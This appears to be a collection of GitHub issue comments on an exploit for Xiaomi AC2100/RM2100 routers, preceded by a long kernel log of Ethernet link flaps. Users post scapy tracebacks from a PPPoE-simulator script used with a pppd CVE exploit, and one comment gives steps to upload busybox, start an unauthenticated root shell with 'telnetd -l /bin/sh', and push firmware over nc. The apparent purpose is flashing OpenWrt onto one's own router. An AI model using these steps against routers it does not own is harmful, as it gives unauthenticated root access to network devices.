[424166.174597] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[424169.362887] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[424223.095875] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[424225.886381] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[430899.484806] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[430901.156044] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[487019.366367] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[487022.222241] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[487058.854884] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[487061.727567] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[493590.062255] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[493591.661977] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[496388.855259] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[496391.603754] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[496424.156040] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[496427.090673] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[498274.450437] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[498276.098359] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[498281.756440] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[498284.465768] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[498338.374582] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[498341.340477] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[498450.096795] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[498451.678471] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[512230.467768] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[512233.181553] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[512260.020756] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[512263.213814] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[517397.295994] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[517399.005194] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[572504.443511] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[572507.148266] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[572543.861429] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[572546.810025] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[573409.243644] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[573410.950567] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[589480.540130] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[589483.352862] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[589537.871197] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[589540.785765] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[603767.335631] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[603768.922509] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[609846.295069] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[609849.026746] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[609903.524747] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[609906.431040] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[611340.493617] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[611342.048128] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[681434.236888] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[681436.998592] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[681491.318313] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[681494.157463] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[689323.711273] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[689325.381624] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[763055.010665] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[763057.844411] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[763113.420339] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[763116.285747] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[763650.673714] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[763652.432650] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[763657.994722] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[763660.780126] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[766716.045863] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[766718.763567] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[766775.393849] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[766778.285961] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[777655.154214] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[777656.815061] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[802079.270228] mtk_soc_eth 1e100000.ethernet eth0: port 0 link down
[802087.525851] mtk_soc_eth 1e100000.ethernet eth0: port 0 link up
[802090.946070] mtk_soc_eth 1e100000.ethernet eth0: port 0 link down
[802094.010462] mtk_soc_eth 1e100000.ethernet eth0: port 0 link up
[802142.214010] mtk_soc_eth 1e100000.ethernet eth0: port 0 link down
[802145.147332] mtk_soc_eth 1e100000.ethernet eth0: port 0 link up
[802180.013570] mtk_soc_eth 1e100000.ethernet eth0: port 0 link down
[802183.127492] mtk_soc_eth 1e100000.ethernet eth0: port 0 link up
[839614.725959] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[839617.446441] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[839674.603990] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[839677.415546] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[840405.281184] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[840407.036032] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[852076.599149] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[852079.314996] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[852133.290638] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[852136.169209] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[854019.114337] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[854021.763403] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[854023.693125] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[854026.407798] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[854076.182114] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[854079.052604] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[864853.324822] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[864855.098383] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[908874.786557] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[908877.580559] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[908932.048954] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[908935.013620] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[909507.397152] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[909508.951539] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[936362.517176] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[936365.241607] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[936419.239958] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[936422.084923] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up

Hi,

I've following all tutorial steps, and update pppoe-simulator.py script with host_uniq fix, but when telnet is listening and I run pppd-cve.py script, no connection was received.

Could you help me?

Waiting for packets
Client->Server | Discovery Initiation
Server->Client | Discovery Offer
Traceback (most recent call last):
File "pppoe-simulator.py", line 183, in
sniff(prn=packet_callback, filter="pppoed or pppoes", lfilter=isNotOutgoing)
File "/usr/lib/python3.8/site-packages/scapy/sendrecv.py", line 1036, in sniff
sniffer._run(*args, **kwargs)
File "/usr/lib/python3.8/site-packages/scapy/sendrecv.py", line 989, in _run
session.on_packet_received(p)
File "/usr/lib/python3.8/site-packages/scapy/sessions.py", line 82, in on_packet_received
result = self.prn(pkt)
File "pppoe-simulator.py", line 68, in packet_callback
sendp(eth_discovery /
File "/usr/lib/python3.8/site-packages/scapy/sendrecv.py", line 377, in sendp
results = __gen_send(socket, x, inter=inter, loop=loop,
File "/usr/lib/python3.8/site-packages/scapy/sendrecv.py", line 308, in __gen_send
s.send(p)
File "/usr/lib/python3.8/site-packages/scapy/arch/linux.py", line 476, in send
return SuperSocket.send(self, x)
File "/usr/lib/python3.8/site-packages/scapy/supersocket.py", line 71, in send
sx = raw(x)
File "/usr/lib/python3.8/site-packages/scapy/compat.py", line 53, in raw
return bytes(x)
File "/usr/lib/python3.8/site-packages/scapy/packet.py", line 498, in bytes
return self.build()
File "/usr/lib/python3.8/site-packages/scapy/packet.py", line 618, in build
p = self.do_build()
File "/usr/lib/python3.8/site-packages/scapy/packet.py", line 603, in do_build
pay = self.do_build_payload()
File "/usr/lib/python3.8/site-packages/scapy/packet.py", line 590, in do_build_payload
return self.payload.do_build()
File "/usr/lib/python3.8/site-packages/scapy/packet.py", line 603, in do_build
pay = self.do_build_payload()
File "/usr/lib/python3.8/site-packages/scapy/packet.py", line 590, in do_build_payload
return self.payload.do_build()
File "/usr/lib/python3.8/site-packages/scapy/packet.py", line 603, in do_build
pay = self.do_build_payload()
File "/usr/lib/python3.8/site-packages/scapy/packet.py", line 590, in do_build_payload
return self.payload.do_build()
File "/usr/lib/python3.8/site-packages/scapy/packet.py", line 603, in do_build
pay = self.do_build_payload()
File "/usr/lib/python3.8/site-packages/scapy/packet.py", line 590, in do_build_payload
return self.payload.do_build()
File "/usr/lib/python3.8/site-packages/scapy/packet.py", line 603, in do_build
pay = self.do_build_payload()
File "/usr/lib/python3.8/site-packages/scapy/packet.py", line 590, in do_build_payload
return self.payload.do_build()
File "/usr/lib/python3.8/site-packages/scapy/packet.py", line 600, in do_build
pkt = self.self_build()
File "/usr/lib/python3.8/site-packages/scapy/packet.py", line 581, in self_build
p = f.addfield(self, p, val)
File "/usr/lib/python3.8/site-packages/scapy/fields.py", line 151, in addfield
return s + self.struct.pack(self.i2m(pkt, val))
File "/usr/lib/python3.8/site-packages/scapy/fields.py", line 1531, in i2m
f = fld.i2len(pkt, fval)
File "/usr/lib/python3.8/site-packages/scapy/fields.py", line 1020, in i2len
return len(x)
TypeError: object of type 'NoneType' has no len()

If I run it in a normal user, it says

Then I run it with root, it says

I checked the size of the busybox file, it should be right.
What version of Ubuntu should I use?

There are firmwares (snapshots) available in the OpenWRT wiki:

https://openwrt.org/toh/xiaomi/xiaomi_mi_router_ac2100#installation

I wonder which I should use, and if there are differences, what they are. I think this would fit better in the README. :)

i was unable to exploit the black cylinder with this error:
Waiting for packets
Client->Server | Discovery Initiation
Server->Client | Discovery Offer
Traceback (most recent call last):
File "pppoe-simulator.py", line 183, in
sniff(prn=packet_callback, filter="pppoed or pppoes", lfilter=isNotOutgoing)
File "/usr/lib/python3/dist-packages/scapy/sendrecv.py", line 972, in sniff
sniffer._run(*args, **kwargs)
File "/usr/lib/python3/dist-packages/scapy/sendrecv.py", line 925, in _run
session.on_packet_received(p)
File "/usr/lib/python3/dist-packages/scapy/sessions.py", line 47, in on_packet_received
result = self.prn(pkt)
File "pppoe-simulator.py", line 68, in packet_callback
sendp(eth_discovery /
File "/usr/lib/python3/dist-packages/scapy/sendrecv.py", line 336, in sendp
results = __gen_send(socket, x, inter=inter, loop=loop,
File "/usr/lib/python3/dist-packages/scapy/sendrecv.py", line 291, in __gen_send
s.send(p)
File "/usr/lib/python3/dist-packages/scapy/arch/linux.py", line 559, in send
return SuperSocket.send(self, x)
File "/usr/lib/python3/dist-packages/scapy/supersocket.py", line 48, in send
sx = raw(x)
File "/usr/lib/python3/dist-packages/scapy/compat.py", line 52, in raw
return bytes(x)
File "/usr/lib/python3/dist-packages/scapy/packet.py", line 487, in bytes
return self.build()
File "/usr/lib/python3/dist-packages/scapy/packet.py", line 607, in build
p = self.do_build()
File "/usr/lib/python3/dist-packages/scapy/packet.py", line 592, in do_build
pay = self.do_build_payload()
File "/usr/lib/python3/dist-packages/scapy/packet.py", line 579, in do_build_payload
return self.payload.do_build()
File "/usr/lib/python3/dist-packages/scapy/packet.py", line 592, in do_build
pay = self.do_build_payload()
File "/usr/lib/python3/dist-packages/scapy/packet.py", line 579, in do_build_payload
return self.payload.do_build()
File "/usr/lib/python3/dist-packages/scapy/packet.py", line 592, in do_build
pay = self.do_build_payload()
File "/usr/lib/python3/dist-packages/scapy/packet.py", line 579, in do_build_payload
return self.payload.do_build()
File "/usr/lib/python3/dist-packages/scapy/packet.py", line 592, in do_build
pay = self.do_build_payload()
File "/usr/lib/python3/dist-packages/scapy/packet.py", line 579, in do_build_payload
return self.payload.do_build()
File "/usr/lib/python3/dist-packages/scapy/packet.py", line 592, in do_build
pay = self.do_build_payload()
File "/usr/lib/python3/dist-packages/scapy/packet.py", line 579, in do_build_payload
return self.payload.do_build()
File "/usr/lib/python3/dist-packages/scapy/packet.py", line 589, in do_build
pkt = self.self_build()
File "/usr/lib/python3/dist-packages/scapy/packet.py", line 570, in self_build
p = f.addfield(self, p, val)
File "/usr/lib/python3/dist-packages/scapy/fields.py", line 140, in addfield
return s + struct.pack(self.fmt, self.i2m(pkt, val))
File "/usr/lib/python3/dist-packages/scapy/fields.py", line 1380, in i2m
f = fld.i2len(pkt, fval)
File "/usr/lib/python3/dist-packages/scapy/fields.py", line 938, in i2len
return len(x)
TypeError: object of type 'NoneType' has no len()

so i found this
Percy233/PPPoE_Simulator-for-RM2100-exploit#2

please add this fix, it works perfectly

应该是个案

路由表和iptables都正常

wget http://192.168.31.177/busybox
# 返回 no route to host

解决：

1. 在电脑端执行把busybox转base64

base64 ./busybox > busybox.base64.txt

2. 复制base64到剪贴板，在router端执行

cd /tmp
echo "you base64 string" >./busybox.base64.txt
base64 -d ./busybox.base64.txt > ./busybox

3.执行busybox运行telnet server

chmod a+x ./busybox
./busybox telnetd -l /bin/sh

4. 在本机连接telnet后执行nc文件传入

./busybox nc -l -p 18000 > ./rootfs0.bin #or kernel1.bin

5.在本机执行传入nc

nc 192.168.31.1 18000 < ./openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-squashfs-rootfs0.bin #or  xxxx.kernel1.bin

6.校验hash

sha1sum openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-squashfs-rootfs0.bin 
# b60c4dcbb1f6331009448e7a2a67d44ebc62b608  openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-squashfs-rootfs0.bin
./busybox sha1sum ./rootfs0.bin 
#b60c4dcbb1f6331009448e7a2a67d44ebc62b608  ./rootfs0.bin

其他流程不变